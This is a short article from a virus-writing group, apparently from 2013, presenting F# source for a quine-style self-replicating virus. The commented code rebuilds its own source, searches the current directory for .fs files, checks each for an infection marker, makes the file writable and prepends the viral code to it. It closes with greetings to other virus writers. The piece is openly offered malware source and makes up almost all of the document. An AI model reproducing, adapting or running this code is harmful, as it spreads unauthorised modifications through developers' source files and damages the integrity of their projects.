﻿                              Quine Viruses in F#
                              roy g biv / defjam


What is it?

A  quine is a program which emits a copy of its own source code as its output.
We  can  make a variation of this technique to make a virus, which copies  its
own  source  code instead.  This is harder than printing itself.  The idea  is
source  code  infection,  well known for many years already, but we do  it  in
elegant form for the first time.  Here is the code:

let a=""                                                // place atoi(code,16) here first, begin with second '"'
let mutable b="let a=\""+a                              // create string declaration and append atoi entire code
open System
open System.IO
for c in 0..2..a.Length-1 do
    b<-b+Convert.ToString(Convert.ToChar(Convert.ToByte(a.[c..c+1],16)))
                                                        // append plaintext code
for(a)in(new DirectoryInfo(".")).GetFiles("*.fs")do     // find all .fs files
    let c=a.Name
    let d=File.ReadAllText(c)                           // read entire file
    if d.Contains("Quine")=false then                   // check for infection marker
        let e=File.GetAttributes(c)
        File.SetAttributes(c,FileAttributes.Normal)     // make file writable
        File.WriteAllText(c,b+d)                        // write everything
        File.SetAttributes(c,e)                         // restore attributes
//Quine - roy g biv 09/09/13


Greets to friendly people (A-Z):

Active - Benny - herm1t - hh86 - jqwerty - Malum - Obleak - Prototype -
Ratter - Ronin - RT Fishel - sars - SPTH - The Gingerbread Man - Ultras -
uNdErX - Vallez - Vecna - Whitehead


rgb/defjam september 2013
iam_rgb@hotmail.com
